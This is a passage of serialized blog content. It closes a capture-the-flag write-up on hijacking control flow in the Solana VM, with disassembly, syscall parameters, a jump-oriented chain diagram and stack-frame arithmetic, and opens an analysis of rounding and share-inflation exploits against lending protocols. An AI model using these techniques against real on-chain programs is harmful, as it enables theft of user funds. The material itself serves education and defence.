1502030000000000",{"type":28,"tag":116,"props":44675,"children":44676},{"style":272},[44677],{"type":33,"value":44433},{"type":28,"tag":116,"props":44679,"children":44680},{"style":266},[44681],{"type":33,"value":8391},{"type":28,"tag":116,"props":44683,"children":44684},{"style":370},[44685],{"type":33,"value":2268},{"type":28,"tag":116,"props":44687,"children":44688},{"style":350},[44689],{"type":33,"value":16957},{"type":28,"tag":116,"props":44691,"children":44692},{"style":266},[44693],{"type":33,"value":5492},{"type":28,"tag":116,"props":44695,"children":44696},{"style":272},[44697],{"type":33,"value":44131},{"type":28,"tag":116,"props":44699,"children":44700},{"style":266},[44701],{"type":33,"value":825},{"type":28,"tag":116,"props":44703,"children":44704},{"style":350},[44705],{"type":33,"value":44014},{"type":28,"tag":116,"props":44707,"children":44708},{"class":245,"line":1294},[44709],{"type":28,"tag":116,"props":44710,"children":44711},{"emptyLinePlaceholder":19},[44712],{"type":33,"value":1044},{"type":28,"tag":116,"props":44714,"children":44715},{"class":245,"line":1334},[44716,44721,44726,44730,44734,44738,44742,44746,44751,44755,44760],{"type":28,"tag":116,"props":44717,"children":44718},{"style":272},[44719],{"type":33,"value":44720},"100001c50",{"type":28,"tag":116,"props":44722,"children":44723},{"style":272},[44724],{"type":33,"value":44725},"  79a1c8ff00000000",{"type":28,"tag":116,"props":44727,"children":44728},{"style":272},[44729],{"type":33,"value":43750},{"type":28,"tag":116,"props":44731,"children":44732},{"style":272},[44733],{"type":33,"value":44044},{"type":28,"tag":116,"props":44735,"children":44736},{"style":266},[44737],{"type":33,"value":43760},{"type":28,"tag":116,"props":44739,"children":44740},{"style":272},[44741],{"type":33,"value":43765},{"type":28,"tag":116,"props":44743,"children":44744},{"style":370},[44745],{"type":33,"value":3996},{"type":28,"tag":116,"props":44747,"children":44748},{"style":350},[44749],{"type":33,"value":44750},"56",{"type":28,"tag":116,"props":44752,"children":44753},{"style":266},[44754],{"type":33,"value":43779},{"type":28,"tag":116,"props":44756,"children":44757},{"style":272},[44758],{"type":33,"value":44759},"var_38",{"type":28,"tag":116,"props":44761,"children":44762},{"style":266},[44763],{"type":33,"value":406},{"type":28,"tag":116,"props":44765,"children":44766},{"class":245,"line":1372},[44767,44772,44776,44780,44784,44788],{"type":28,"tag":116,"props":44768,"children":44769},{"style":272},[44770],{"type":33,"value":44771},"100001c58",{"type":28,"tag":116,"props":44773,"children":44774},{"style":272},[44775],{"type":33,"value":44563},{"type":28,"tag":116,"props":44777,"children":44778},{"style":272},[44779],{"type":33,"value":44039},{"type":28,"tag":116,"props":44781,"children":44782},{"style":272},[44783],{"type":33,"value":43810},{"type":28,"tag":116,"props":44785,"children":44786},{"style":266},[44787],{"type":33,"value":825},{"type":28,"tag":116,"props":44789,"children":44790},{"style":350},[44791],{"type":33,"value":44580},{"type":28,"tag":116,"props":44793,"children":44794},{"class":245,"line":1381},[44795,44800,44805,44809],{"type":28,"tag":116,"props":44796,"children":44797},{"style":272},[44798],{"type":33,"value":44799},"100001c60",{"type":28,"tag":116,"props":44801,"children":44802},{"style":272},[44803],{"type":33,"value":44804},"  85100000fefdffff",{"type":28,"tag":116,"props":44806,"children":44807},{"style":272},[44808],{"type":33,"value":43961},{"type":28,"tag":116,"props":44810,"children":44811},{"style":272},[44812],{"type":33,"value":44602},{"type":28,"tag":116,"props":44814,"children":44815},{"class":245,"line":1389},[44816],{"type":28,"tag":116,"props":44817,"children":44818},{"emptyLinePlaceholder":19},[44819],{"type":33,"value":1044},{"type":28,"tag":116,"props":44821,"children":44822},{"class":245,"line":1425},[44823,44828,44833,44838,44843,44848],{"type":28,"tag":116,"props":44824,"children":44825},{"style":272},[44826],{"type":33,"value":44827},"100001c68",{"type":28,"tag":116,"props":44829,"children":44830},{"style":350},[44831],{"type":33,"value":44832},"  9500000000000000",{"type":28,"tag":116,"props":44834,"children":44835},{"style":272},[44836],{"type":33,"value":44837},"   exit",{"type":28,"tag":116,"props":44839,"children":44840},{"style":266},[44841],{"type":33,"value":44842}," {",{"type":28,"tag":116,"props":44844,"children":44845},{"style":272},[44846],{"type":33,"value":44847},"__return_addr",{"type":28,"tag":116,"props":44849,"children":44850},{"style":266},[44851],{"type":33,"value":406},{"type":28,"tag":29,"props":44853,"children":44854},{},[44855,44857,44863],{"type":33,"value":44856},"Which, assuming that ",{"type":28,"tag":98,"props":44858,"children":44860},{"className":44859},[],[44861],{"type":33,"value":44862},"sol_invoke_signed_rust",{"type":33,"value":44864}," returns 0, is doing the following:",{"type":28,"tag":455,"props":44866,"children":44867},{},[44868,44877,44886],{"type":28,"tag":459,"props":44869,"children":44870},{},[44871],{"type":28,"tag":98,"props":44872,"children":44874},{"className":44873},[],[44875],{"type":33,"value":44876},"sol_invoke_signed_rust(r1, [r10-136], [r10-128], [r10-152], [r10-144])",{"type":28,"tag":459,"props":44878,"children":44879},{},[44880],{"type":28,"tag":98,"props":44881,"children":44883},{"className":44882},[],[44884],{"type":33,"value":44885},"*[r10-120] = 0x18",{"type":28,"tag":459,"props":44887,"children":44888},{},[44889,44891,44897,44899,44906],{"type":33,"value":44890},"Calls ",{"type":28,"tag":98,"props":44892,"children":44894},{"className":44893},[],[44895],{"type":33,"value":44896},"__rust_dealloc",{"type":33,"value":44898},", which in default circumstances is a ",{"type":28,"tag":87,"props":44900,"children":44903},{"href":44901,"rel":44902},"https://github.com/solana-labs/solana/blob/v1.17.4/sdk/program/src/entrypoint.rs#L257C1-L259",[91],[44904],{"type":33,"value":44905},"NOP",{"type":33,"value":141},{"type":28,"tag":29,"props":44908,"children":44909},{},[44910],{"type":33,"value":44911},"r10 is the stack pointer, so it will point to the stack frame of the current depth when executing that instruction.",{"type":28,"tag":29,"props":44913,"children":44914},{},[44915],{"type":33,"value":44916},"If we correctly set up the stack frame used by this gadget with valid parameters, that's a win.",{"type":28,"tag":29,"props":44918,"children":44919},{},[44920,44922,44929],{"type":33,"value":44921},"Looking at the ",{"type":28,"tag":87,"props":44923,"children":44926},{"href":44924,"rel":44925},"https://github.com/solana-labs/solana/blob/master/sdk/program/src/syscalls/definitions.rs#L59",[91],[44927],{"type":33,"value":44928},"definition",{"type":33,"value":44930},", it's not crystal clear what the parameters are:",{"type":28,"tag":234,"props":44932,"children":44934},{"className":2652,"code":44933,"language":2651,"meta":7,"style":7},"fn sol_invoke_signed_rust(instruction_addr: *const u8, account_infos_addr: *const u8, account_infos_len: u64, signers_seeds_addr: *const u8, signers_seeds_len: u64) -> u64\n",[44935],{"type":28,"tag":98,"props":44936,"children":44937},{"__ignoreMap":7},[44938],{"type":28,"tag":116,"props":44939,"children":44940},{"class":245,"line":246},[44941,44945,44950,44954,44959,44963,44967,44971,44975,44979,44984,44988,44992,44996,45000,45004,45009,45013,45017,45021,45026,45030,45034,45038,45042,45046,45051,45055,45059,45063,45067],{"type":28,"tag":116,"props":44942,"children":44943},{"style":376},[44944],{"type":33,"value":19930},{"type":28,"tag":116,"props":44946,"children":44947},{"style":282},[44948],{"type":33,"value":44949}," sol_invoke_signed_rust",{"type":28,"tag":116,"props":44951,"children":44952},{"style":266},[44953],{"type":33,"value":313},{"type":28,"tag":116,"props":44955,"children":44956},{"style":272},[44957],{"type":33,"value":44958},"instruction_addr",{"type":28,"tag":116,"props":44960,"children":44961},{"style":370},[44962],{"type":33,"value":4160},{"type":28,"tag":116,"props":44964,"children":44965},{"style":370},[44966],{"type":33,"value":9484},{"type":28,"tag":116,"props":44968,"children":44969},{"style":376},[44970],{"type":33,"value":9323},{"type":28,"tag":116,"props":44972,"children":44973},{"style":339},[44974],{"type":33,"value":14300},{"type":28,"tag":116,"props":44976,"children":44977},{"style":266},[44978],{"type":33,"value":825},{"type":28,"tag":116,"props":44980,"children":44981},{"style":272},[44982],{"type":33,"value":44983},"account_infos_addr",{"type":28,"tag":116,"props":44985,"children":44986},{"style":370},[44987],{"type":33,"value":4160},{"type":28,"tag":116,"props":44989,"children":44990},{"style":370},[44991],{"type":33,"value":9484},{"type":28,"tag":116,"props":44993,"children":44994},{"style":376},[44995],{"type":33,"value":9323},{"type":28,"tag":116,"props":44997,"children":44998},{"style":339},[44999],{"type":33,"value":14300},{"type":28,"tag":116,"props":45001,"children":45002},{"style":266},[45003],{"type":33,"value":825},{"type":28,"tag":116,"props":45005,"children":45006},{"style":272},[45007],{"type":33,"value":45008},"account_infos_len",{"type":28,"tag":116,"props":45010,"children":45011},{"style":370},[45012],{"type":33,"value":4160},{"type":28,"tag":116,"props":45014,"children":45015},{"style":339},[45016],{"type":33,"value":5531},{"type":28,"tag":116,"props":45018,"children":45019},{"style":266},[45020],{"type":33,"value":825},{"type":28,"tag":116,"props":45022,"children":45023},{"style":272},[45024],{"type":33,"value":45025},"signers_seeds_addr",{"type":28,"tag":116,"props":45027,"children":45028},{"style":370},[45029],{"type":33,"value":4160},{"type":28,"tag":116,"props":45031,"children":45032},{"style":370},[45033],{"type":33,"value":9484},{"type":28,"tag":116,"props":45035,"children":45036},{"style":376},[45037],{"type":33,"value":9323},{"type":28,"tag":116,"props":45039,"children":45040},{"style":339},[45041],{"type":33,"value":14300},{"type":28,"tag":116,"props":45043,"children":45044},{"style":266},[45045],{"type":33,"value":825},{"type":28,"tag":116,"props":45047,"children":45048},{"style":272},[45049],{"type":33,"value":45050},"signers_seeds_len",{"type":28,"tag":116,"props":45052,"children":45053},{"style":370},[45054],{"type":33,"value":4160},{"type":28,"tag":116,"props":45056,"children":45057},{"style":339},[45058],{"type":33,"value":5531},{"type":28,"tag":116,"props":45060,"children":45061},{"style":266},[45062],{"type":33,"value":1609},{"type":28,"tag":116,"props":45064,"children":45065},{"style":370},[45066],{"type":33,"value":13423},{"type":28,"tag":116,"props":45068,"children":45069},{"style":339},[45070],{"type":33,"value":12863},{"type":28,"tag":29,"props":45072,"children":45073},{},[45074,45076,45081,45083,45090],{"type":33,"value":45075},"The source of ",{"type":28,"tag":87,"props":45077,"children":45079},{"href":45078},"(https://github.com/solana-labs/solana/blob/v1.17.4/sdk/program/src/program.rs#L289)",[45080],{"type":33,"value":43691},{"type":33,"value":45082}," helps a lot, but looking at the actual ",{"type":28,"tag":87,"props":45084,"children":45087},{"href":45085,"rel":45086},"https://github.com/solana-labs/solana/blob/v1.17.4/programs/bpf_loader/src/syscalls/cpi.rs#L458-L637",[91],[45088],{"type":33,"value":45089},"implementation",{"type":33,"value":45091}," provides more clarity:",{"type":28,"tag":2108,"props":45093,"children":45094},{},[45095],{"type":28,"tag":459,"props":45096,"children":45097},{},[45098,45103,45105,45112],{"type":28,"tag":98,"props":45099,"children":45101},{"className":45100},[],[45102],{"type":33,"value":44958},{"type":33,"value":45104}," points to a ",{"type":28,"tag":87,"props":45106,"children":45109},{"href":45107,"rel":45108},"https://github.com/solana-labs/solana/blob/v1.17.4/sdk/program/src/stable_layout/stable_instruction.rs#L33",[91],[45110],{"type":33,"value":45111},"StableInstruction",{"type":33,"value":4160},{"type":28,"tag":29,"props":45114,"children":45115},{},[45116],{"type":28,"tag":206,"props":45117,"children":45119},{"alt":45111,"src":45118},"/posts/jumping-around-in-the-vm/stable_ix.svg",[],{"type":28,"tag":2108,"props":45121,"children":45122},{},[45123,45148],{"type":28,"tag":459,"props":45124,"children":45125},{},[45126,45131,45133,45138,45140,45147],{"type":28,"tag":98,"props":45127,"children":45129},{"className":45128},[],[45130],{"type":33,"value":44983},{"type":33,"value":45132}," points to a slice of ",{"type":28,"tag":98,"props":45134,"children":45136},{"className":45135},[],[45137],{"type":33,"value":45008},{"type":33,"value":45139},"  ",{"type":28,"tag":87,"props":45141,"children":45144},{"href":45142,"rel":45143},"https://github.com/solana-labs/solana/blob/v1.17.4/sdk/program/src/account_info.rs#L19-L36",[91],[45145],{"type":33,"value":45146},"AccountInfos",{"type":33,"value":141},{"type":28,"tag":459,"props":45149,"children":45150},{},[45151,45156,45158,45163,45165,45170],{"type":28,"tag":98,"props":45152,"children":45154},{"className":45153},[],[45155],{"type":33,"value":45025},{"type":33,"value":45157}," is a bit trickier, it points to a slice of length ",{"type":28,"tag":98,"props":45159,"children":45161},{"className":45160},[],[45162],{"type":33,"value":45050},{"type":33,"value":45164},", containing slices of ",{"type":28,"tag":98,"props":45166,"children":45168},{"className":45167},[],[45169],{"type":33,"value":3091},{"type":33,"value":141},{"type":28,"tag":29,"props":45172,"children":45173},{},[45174],{"type":28,"tag":206,"props":45175,"children":45178},{"alt":45176,"src":45177},"signers.drawio","/posts/jumping-around-in-the-vm/signers.svg",[],{"type":28,"tag":29,"props":45180,"children":45181},{},[45182,45184,45189],{"type":33,"value":45183},"Where do we store those fake parameters? We can store them directly inside the input data, and just write the pointers to them on the stack through the write gadget. Note that these writes are to ",{"type":28,"tag":2583,"props":45185,"children":45186},{},[45187],{"type":33,"value":45188},"future call frames",{"type":33,"value":141},{"type":28,"tag":29,"props":45191,"children":45192},{},[45193,45195,45202],{"type":33,"value":45194},"Now that we have all the parts, all we need is to string it together. The full ",{"type":28,"tag":87,"props":45196,"children":45199},{"href":45197,"rel":45198},"https://github.com/chen-robert/paradigmctf-2023/blob/main/jotterp/framework-solve/src/main.rs",[91],[45200],{"type":33,"value":45201},"reference solution can be found here",{"type":33,"value":141},{"type":28,"tag":29,"props":45204,"children":45205},{},[45206],{"type":33,"value":45207},"Here's a visualization of the final JOP chain.",{"type":28,"tag":234,"props":45209,"children":45211},{"className":43573,"code":45210,"language":43575,"meta":7,"style":7},"graph BT\n    A[0: entrypoint] --> B[1: process_instruction]\n    B --> C[2: process]\n    C --> D[3: Write account_infos.ptr to target_r10 - 136]\n    C --> E[3: process]\n    E --> F[4: Write account_infos.len to target_r10 - 128]\n    E --> G[4: process]\n    G --> H[5: Write signers_seeds.ptr to target_r10 - 152]\n    G --> I[5: process]\n    I --> J[6: Write signers_seeds.len to target_r10 - 144]\n    I --> K[6: process]\n    K --> M[7: Write HeapBase to target_r10 - 120]\n    K --> N[7: process]\n    N --> P[8: Invoke CPI Gadget with R0 pointing to the CreateAccount instruction]\n    N --> O[8: Write 0x4337 to the account]\n",[45212],{"type":28,"tag":98,"props":45213,"children":45214},{"__ignoreMap":7},[45215,45223,45230,45237,45245,45252,45260,45268,45276,45284,45292,45300,45308,45316,45324],{"type":28,"tag":116,"props":45216,"children":45217},{"class":245,"line":246},[45218],{"type":28,"tag":116,"props":45219,"children":45220},{},[45221],{"type":33,"value":45222},"graph BT\n",{"type":28,"tag":116,"props":45224,"children":45225},{"class":245,"line":256},[45226],{"type":28,"tag":116,"props":45227,"children":45228},{},[45229],{"type":33,"value":43595},{"type":28,"tag":116,"props":45231,"children":45232},{"class":245,"line":293},[45233],{"type":28,"tag":116,"props":45234,"children":45235},{},[45236],{"type":33,"value":43603},{"type":28,"tag":116,"props":45238,"children":45239},{"class":245,"line":361},[45240],{"type":28,"tag":116,"props":45241,"children":45242},{},[45243],{"type":33,"value":45244},"    C --> D[3: Write account_infos.ptr to target_r10 - 136]\n",{"type":28,"tag":116,"props":45246,"children":45247},{"class":245,"line":387},[45248],{"type":28,"tag":116,"props":45249,"children":45250},{},[45251],{"type":33,"value":43619},{"type":28,"tag":116,"props":45253,"children":45254},{"class":245,"line":400},[45255],{"type":28,"tag":116,"props":45256,"children":45257},{},[45258],{"type":33,"value":45259},"    E --> F[4: Write account_infos.len to target_r10 - 128]\n",{"type":28,"tag":116,"props":45261,"children":45262},{"class":245,"line":614},[45263],{"type":28,"tag":116,"props":45264,"children":45265},{},[45266],{"type":33,"value":45267},"    E --> G[4: process]\n",{"type":28,"tag":116,"props":45269,"children":45270},{"class":245,"line":631},[45271],{"type":28,"tag":116,"props":45272,"children":45273},{},[45274],{"type":33,"value":45275},"    G --> H[5: Write signers_seeds.ptr to target_r10 - 152]\n",{"type":28,"tag":116,"props":45277,"children":45278},{"class":245,"line":665},[45279],{"type":28,"tag":116,"props":45280,"children":45281},{},[45282],{"type":33,"value":45283},"    G --> I[5: process]\n",{"type":28,"tag":116,"props":45285,"children":45286},{"class":245,"line":713},[45287],{"type":28,"tag":116,"props":45288,"children":45289},{},[45290],{"type":33,"value":45291},"    I --> J[6: Write signers_seeds.len to target_r10 - 144]\n",{"type":28,"tag":116,"props":45293,"children":45294},{"class":245,"line":750},[45295],{"type":28,"tag":116,"props":45296,"children":45297},{},[45298],{"type":33,"value":45299},"    I --> K[6: process]\n",{"type":28,"tag":116,"props":45301,"children":45302},{"class":245,"line":779},[45303],{"type":28,"tag":116,"props":45304,"children":45305},{},[45306],{"type":33,"value":45307},"    K --> M[7: Write HeapBase to target_r10 - 120]\n",{"type":28,"tag":116,"props":45309,"children":45310},{"class":245,"line":796},[45311],{"type":28,"tag":116,"props":45312,"children":45313},{},[45314],{"type":33,"value":45315},"    K --> N[7: process]\n",{"type":28,"tag":116,"props":45317,"children":45318},{"class":245,"line":847},[45319],{"type":28,"tag":116,"props":45320,"children":45321},{},[45322],{"type":33,"value":45323},"    N --> P[8: Invoke CPI Gadget with R0 pointing to the CreateAccount instruction]\n",{"type":28,"tag":116,"props":45325,"children":45326},{"class":245,"line":898},[45327],{"type":28,"tag":116,"props":45328,"children":45329},{},[45330],{"type":33,"value":45331},"    N --> O[8: Write 0x4337 to the account]\n",{"type":28,"tag":29,"props":45333,"children":45334},{},[45335,45337,45343],{"type":33,"value":45336},"Small note: ",{"type":28,"tag":98,"props":45338,"children":45340},{"className":45339},[],[45341],{"type":33,"value":45342},"target_r10",{"type":33,"value":45344}," is the address of the call frame when the CPI gadget is invoked, which, as shown in the graph, is the 8th frame. Its address can be calculated as follows:",{"type":28,"tag":234,"props":45346,"children":45348},{"className":2652,"code":45347,"language":2651,"meta":7,"style":7},"fn call_frame_addr(depth: u64) -> u64 {\n    0x200000000 + 0x2000 * depth + 0x1000\n}\n// call_frame_addr(8) = 0x200011000\n",[45349],{"type":28,"tag":98,"props":45350,"children":45351},{"__ignoreMap":7},[45352,45397,45432,45439],{"type":28,"tag":116,"props":45353,"children":45354},{"class":245,"line":246},[45355,45359,45364,45368,45373,45377,45381,45385,45389,45393],{"type":28,"tag":116,"props":45356,"children":45357},{"style":376},[45358],{"type":33,"value":19930},{"type":28,"tag":116,"props":45360,"children":45361},{"style":282},[45362],{"type":33,"value":45363}," call_frame_addr",{"type":28,"tag":116,"props":45365,"children":45366},{"style":266},[45367],{"type":33,"value":313},{"type":28,"tag":116,"props":45369,"children":45370},{"style":272},[45371],{"type":33,"value":45372},"depth",{"type":28,"tag":116,"props":45374,"children":45375},{"style":370},[45376],{"type":33,"value":4160},{"type":28,"tag":116,"props":45378,"children":45379},{"style":339},[45380],{"type":33,"value":5531},{"type":28,"tag":116,"props":45382,"children":45383},{"style":266},[45384],{"type":33,"value":1609},{"type":28,"tag":116,"props":45386,"children":45387},{"style":370},[45388],{"type":33,"value":13423},{"type":28,"tag":116,"props":45390,"children":45391},{"style":339},[45392],{"type":33,"value":5531},{"type":28,"tag":116,"props":45394,"children":45395},{"style":266},[45396],{"type":33,"value":1291},{"type":28,"tag":116,"props":45398,"children":45399},{"class":245,"line":256},[45400,45405,45409,45414,45418,45423,45427],{"type":28,"tag":116,"props":45401,"children":45402},{"style":350},[45403],{"type":33,"value":45404},"    0x200000000",{"type":28,"tag":116,"props":45406,"children":45407},{"style":370},[45408],{"type":33,"value":2258},{"type":28,"tag":116,"props":45410,"children":45411},{"style":350},[45412],{"type":33,"value":45413}," 0x2000",{"type":28,"tag":116,"props":45415,"children":45416},{"style":370},[45417],{"type":33,"value":9484},{"type":28,"tag":116,"props":45419,"children":45420},{"style":272},[45421],{"type":33,"value":45422}," depth",{"type":28,"tag":116,"props":45424,"children":45425},{"style":370},[45426],{"type":33,"value":2258},{"type":28,"tag":116,"props":45428,"children":45429},{"style":350},[45430],{"type":33,"value":45431}," 0x1000\n",{"type":28,"tag":116,"props":45433,"children":45434},{"class":245,"line":293},[45435],{"type":28,"tag":116,"props":45436,"children":45437},{"style":266},[45438],{"type":33,"value":406},{"type":28,"tag":116,"props":45440,"children":45441},{"class":245,"line":361},[45442],{"type":28,"tag":116,"props":45443,"children":45444},{"style":250},[45445],{"type":33,"value":45446},"// call_frame_addr(8) = 0x200011000\n",{"type":28,"tag":63,"props":45448,"children":45449},{"id":2506},[45450],{"type":33,"value":2509},{"type":28,"tag":29,"props":45452,"children":45453},{},[45454,45456,45463],{"type":33,"value":45455},"Most blockchain vulnerabilities are high-level business logic bugs. While low-level Solana bugs are rare, ",{"type":28,"tag":87,"props":45457,"children":45460},{"href":45458,"rel":45459},"https://osec.io/blog/2022-12-09-rust-realloc-and-references",[91],[45461],{"type":33,"value":45462},"they do exist",{"type":33,"value":141},{"type":28,"tag":29,"props":45465,"children":45466},{},[45467],{"type":33,"value":45468},"In this blog post, we provided an exploration of the exploitation side of security. There's a surprising amount of work necessary to go from powerful memory corruption primitives to full control of the program.",{"type":28,"tag":29,"props":45470,"children":45471},{},[45472,45474,45479],{"type":33,"value":45473},"Security requires a top-to-bottom understanding of the execution environment. We hope this challenge and blog post motivate others to understand the ",{"type":28,"tag":2583,"props":45475,"children":45476},{},[45477],{"type":33,"value":45478},"entire",{"type":33,"value":45480}," runtime.",{"type":28,"tag":2516,"props":45482,"children":45483},{},[45484],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":45486},[45487,45491,45492,45495],{"id":18619,"depth":256,"text":18622,"children":45488},[45489,45490],{"id":40161,"depth":293,"text":40164},{"id":41480,"depth":293,"text":41483},{"id":42719,"depth":256,"text":42722},{"id":43555,"depth":256,"text":43558,"children":45493},[45494],{"id":43669,"depth":293,"text":43672},{"id":2506,"depth":256,"text":2509},"content:blog:2023-12-11-jumping-around-in-the-vm.md","blog/2023-12-11-jumping-around-in-the-vm.md","blog/2023-12-11-jumping-around-in-the-vm",{"_path":45500,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":45501,"description":45502,"author":45503,"image":45504,"date":45506,"isFeatured":19,"onBlogPage":19,"body":45507,"_type":2534,"_id":46653,"_source":2536,"_file":46654,"_stem":46655,"_extension":2539},"/blog/2024-01-18-rounding-bugs","Rounding Bugs: An Analysis","Rounding-related hacks are having a moment in the spotlight. We explore these exploits, correct some popular misunderstandings, and provide mitigations.",[5391],{"src":45505},"/posts/rounding-bugs/cover.png","2024-01-18",{"type":25,"children":45508,"toc":46642},[45509,45513,45541,45546,45559,45564,45570,45575,45580,45585,45590,45603,45615,45635,45655,45660,45665,45683,45689,45694,45700,45714,45727,45732,45738,45752,45757,45779,46012,46017,46022,46035,46275,46285,46290,46296,46301,46306,46339,46344,46355,46361,46366,46380,46508,46522,46598,46603,46614,46619,46624,46628,46633,46638],{"type":28,"tag":63,"props":45510,"children":45511},{"id":28670},[45512],{"type":33,"value":28673},{"type":28,"tag":29,"props":45514,"children":45515},{},[45516,45518,45525,45526,45533,45535,45540],{"type":33,"value":45517},"Recently, there's been a series of attacks exploiting share rounding against lending protocols. Rounding attacks are already known to developers on ",{"type":28,"tag":87,"props":45519,"children":45522},{"href":45520,"rel":45521},"https://neodyme.io/de/blog/lending_disclosure",[91],[45523],{"type":33,"value":45524},"fast",{"type":33,"value":825},{"type":28,"tag":87,"props":45527,"children":45530},{"href":45528,"rel":45529},"https://osec.io/blog/2022-04-26-spl-swap-rounding",[91],[45531],{"type":33,"value":45532},"cheap",{"type":33,"value":45534}," chains with high-value tokens. These attacks are novel in that they also work against low-value tokens on expensive chains. ",{"type":28,"tag":2583,"props":45536,"children":45537},{},[45538],{"type":33,"value":45539},"Most people haven't considered what happens when shares are worth a lot",{"type":33,"value":141},{"type":28,"tag":29,"props":45542,"children":45543},{},[45544],{"type":33,"value":45545},"Much of the previous discourse has mischaracterized the rootcause of these hacks. For example, the presence of flashloans is largely irrelevant. At a high level, these attacks only require two key steps:",{"type":28,"tag":455,"props":45547,"children":45548},{},[45549,45554],{"type":28,"tag":459,"props":45550,"children":45551},{},[45552],{"type":33,"value":45553},"Inflate share value (token to share conversion rate)",{"type":28,"tag":459,"props":45555,"children":45556},{},[45557],{"type":33,"value":45558},"Exploit rounding bug",{"type":28,"tag":29,"props":45560,"children":45561},{},[45562],{"type":33,"value":45563},"In this blog post, we explore these attacks in detail and provide potential mitigations.",{"type":28,"tag":63,"props":45565,"children":45567},{"id":45566},"model",[45568],{"type":33,"value":45569},"Model",{"type":28,"tag":29,"props":45571,"children":45572},{},[45573],{"type":33,"value":45574},"Before we dive in, there's some helpful background information we'll share first.",{"type":28,"tag":29,"props":45576,"children":45577},{},[45578],{"type":33,"value":45579},"A common form of accounting is the share and token model. When a user deposits a token, they receive back shares. Shares can accrue value, whether through interest or protocol fees.",{"type":28,"tag":29,"props":45581,"children":45582},{},[45583],{"type":33,"value":45584},"When users want to withdraw their tokens, they burn shares and receive the corresponding amount of tokens back. This is nice in theory. Unfortunately, in the real world, we have fixed precision. You can't have 1.01 shares, it needs to be either one or two. Which way should we round?",{"type":28,"tag":29,"props":45586,"children":45587},{},[45588],{"type":33,"value":45589},"This question is more complex than it may appear. Let's walk through an example.",{"type":28,"tag":29,"props":45591,"children":45592},{},[45593,45595,45601],{"type":33,"value":45594},"Say we initialize shares and tokens in a one-to-one ratio. After an initial deposit of 1000 tokens, the pool state is ",{"type":28,"tag":98,"props":45596,"children":45598},{"className":45597},[],[45599],{"type":33,"value":45600},"1000:1000",{"type":33,"value":45602}," (1000 tokens to 1000 shares).",{"type":28,"tag":29,"props":45604,"children":45605},{},[45606,45608,45614],{"type":33,"value":45607},"After accruing fees, the pool gains one token for a new ratio of ",{"type":28,"tag":98,"props":45609,"children":45611},{"className":45610},[],[45612],{"type":33,"value":45613},"1001:1000",{"type":33,"value":141},{"type":28,"tag":29,"props":45616,"children":45617},{},[45618,45620,45626,45628,45633],{"type":33,"value":45619},"How many tokens should we get back when withdrawing 999 shares? The real answer is ",{"type":28,"tag":98,"props":45621,"children":45623},{"className":45622},[],[45624],{"type":33,"value":45625},"1001/1000*999 = 999.999",{"type":33,"value":45627},". Unfortunately, we can only send the user 1000 or 999 tokens. For now, let's assume we round ",{"type":28,"tag":2583,"props":45629,"children":45630},{},[45631],{"type":33,"value":45632},"down",{"type":33,"value":45634}," against the user.",{"type":28,"tag":29,"props":45636,"children":45637},{},[45638,45640,45646,45648,45654],{"type":33,"value":45639},"If we give the user 999 tokens, the new pool state is ",{"type":28,"tag":98,"props":45641,"children":45643},{"className":45642},[],[45644],{"type":33,"value":45645},"2:1",{"type":33,"value":45647},". The value of a share doubled! What happens if we deposit 1 more token? We'll get back zero shares, further inflating the ratio to ",{"type":28,"tag":98,"props":45649,"children":45651},{"className":45650},[],[45652],{"type":33,"value":45653},"3:1",{"type":33,"value":141},{"type":28,"tag":29,"props":45656,"children":45657},{},[45658],{"type":33,"value":45659},"Small decisions like rounding direction can have a big impact on share valuation. Generally, share valuation isn't a strict security boundary.",{"type":28,"tag":29,"props":45661,"children":45662},{},[45663],{"type":33,"value":45664},"The above is a bit of a simplification. In practice, there are several protocol-specific design decisions:",{"type":28,"tag":455,"props":45666,"children":45667},{},[45668,45673,45678],{"type":28,"tag":459,"props":45669,"children":45670},{},[45671],{"type":33,"value":45672},"Can you deposit and receive back zero shares? If not, you'll need to spend more effort to exploit the rounding error",{"type":28,"tag":459,"props":45674,"children":45675},{},[45676],{"type":33,"value":45677},"When you withdraw, are you withdrawing shares or tokens?",{"type":28,"tag":459,"props":45679,"children":45680},{},[45681],{"type":33,"value":45682},"Can you directly manipulate pool state by sending tokens? Hopefully not.",{"type":28,"tag":63,"props":45684,"children":45686},{"id":45685},"decisions",[45687],{"type":33,"value":45688},"Decisions",{"type":28,"tag":29,"props":45690,"children":45691},{},[45692],{"type":33,"value":45693},"Let's assume that we're able to inflate the value of a share. How can we actually exploit this?",{"type":28,"tag":75,"props":45695,"children":45697},{"id":45696},"radiant-capital",[45698],{"type":33,"value":45699},"Radiant Capital",{"type":28,"tag":29,"props":45701,"children":45702},{},[45703,45705,45712],{"type":33,"value":45704},"Radiant Capital was ",{"type":28,"tag":87,"props":45706,"children":45709},{"href":45707,"rel":45708},"https://arbiscan.io/tx/0x1ce7e9a9e3b6dd3293c9067221ac3260858ce119ecb7ca860eac28b2474c7c9b",[91],[45710],{"type":33,"value":45711},"hacked on Jan 2nd",{"type":33,"value":45713}," for about $4.5M. This was the original example of exploiting rounding on otherwise inconsequential shares.",{"type":28,"tag":29,"props":45715,"children":45716},{},[45717,45719,45726],{"type":33,"value":45718},"The exploit is relatively straightforward and ",{"type":28,"tag":87,"props":45720,"children":45723},{"href":45721,"rel":45722},"https://medium.com/@_kcyw/radiant-capital-hack-explained-1633289be150",[91],[45724],{"type":33,"value":45725},"has already been covered previously",{"type":33,"value":141},{"type":28,"tag":29,"props":45728,"children":45729},{},[45730],{"type":33,"value":45731},"At a high level, this exploit is exactly what you'd expect. If shares were worth $1000 each, and the user tried to withdraw $1999, they only needed to burn one share. Free money.",{"type":28,"tag":75,"props":45733,"children":45735},{"id":45734},"wise-lending",[45736],{"type":33,"value":45737},"Wise Lending",{"type":28,"tag":29,"props":45739,"children":45740},{},[45741,45743,45750],{"type":33,"value":45742},"Wise Lending was ",{"type":28,"tag":87,"props":45744,"children":45747},{"href":45745,"rel":45746},"https://etherscan.io/tx/0x04e16a79ff928db2fa88619cdd045cdfc7979a61d836c9c9e585b3d6f6d8bc31",[91],[45748],{"type":33,"value":45749},"hacked on January 13th",{"type":33,"value":45751}," for just under $460,000.",{"type":28,"tag":29,"props":45753,"children":45754},{},[45755],{"type":33,"value":45756},"Again, share prices were inflated artificially high. However, the rounding direction seemed to be correct. This was a new variant.",{"type":28,"tag":29,"props":45758,"children":45759},{},[45760,45762,45769,45771,45778],{"type":33,"value":45761},"This is 